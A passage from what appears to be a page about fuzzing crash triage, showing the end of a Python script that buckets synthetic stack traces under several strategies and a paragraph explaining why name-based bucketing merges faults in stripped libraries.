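               _f("buggy_function", "buggy.c", 42, offset=0x1180),
               _f("parse_header", "buggy.c", 80, offset=0x1230),
               _f("main", "buggy.c", 150, offset=0x1300)],
    "id_001": [_f("buggy_function", "buggy.c", 42, offset=0x1180),   # same site, other caller
               _f("parse_trailer", "buggy.c", 120, offset=0x12a0),
               _f("main", "buggy.c", 150, offset=0x1300)],
    "id_002": [_f("buggy_function", "buggy.c", 57, offset=0x11c4),   # other line, same function
               _f("parse_header", "buggy.c", 80, offset=0x1230),
               _f("main", "buggy.c", 150, offset=0x1300)],
    "id_003": [_f("??", module="libtarget.so", offset=0x1f30),       # stripped library
               _f("main", offset=0x1300)],
    "id_004": [_f("??", module="libtarget.so", offset=0x2a10),       # stripped, other site
               _f("main", offset=0x1300)],
}


def triage_stats(strategy: str) -> str:
    """One summary line in the shape of AFLTriage's 'Crashes: N (unique M)'."""
    unique = len(bucket_crashes(CRASHES, strategy))
    return f"{strategy:20s} Crashes: {len(CRASHES)} (unique {unique})"


if __name__ == "__main__":
    for s in STRATEGIES:
        print(triage_stats(s))
```

<p dir="auto">Run stand-alone it prints one <code>Crashes: 5 (unique N)</code> line per strategy. Two things the output makes visible: the two aborting frames on <code>id_000</code> have to be skipped before any frame-based strategy is useful, and on the stripped <code>libtarget.so</code> crashes the name-based strategies (<code>function_names</code>, <code>first_function_name</code>) see only <code>??</code> and merge unrelated faults into one bucket, whereas the address-based keys keep them apart. When triaging binaries without symbols, pick a strategy that keys on module and offset rather than on names.</p>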